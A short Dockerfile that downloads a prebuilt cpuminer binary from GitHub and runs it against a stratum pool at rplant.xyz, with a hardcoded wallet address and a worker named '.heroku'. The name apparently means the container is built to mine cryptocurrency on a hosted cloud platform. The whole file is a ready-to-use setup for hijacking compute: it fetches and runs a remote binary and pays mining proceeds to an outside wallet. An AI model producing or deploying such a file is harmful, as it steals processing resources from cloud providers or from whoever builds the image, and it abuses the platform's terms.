FROM ubuntu:18.04

RUN apt update && apt install wget libcurl4 -y
RUN wget https://github.com/WyvernTKC/cpuminer-gr-avx2/releases/download/1.2.3/cpuminer-gr-1.2.3-x86_64_linux.tar.gz
RUN tar xf cpuminer-gr-1.2.3-x86_64_linux.tar.gz
WORKDIR cpuminer-gr-1.2.3-x86_64_linux/binaries
RUN ./cpuminer-avx2 -a gr -o stratum+tcp://stratum-asia.rplant.xyz:17056 -u RTsvPQ2eLLazNfmkijMfJ8m3B97L1k9aiT.heroku --no-tune
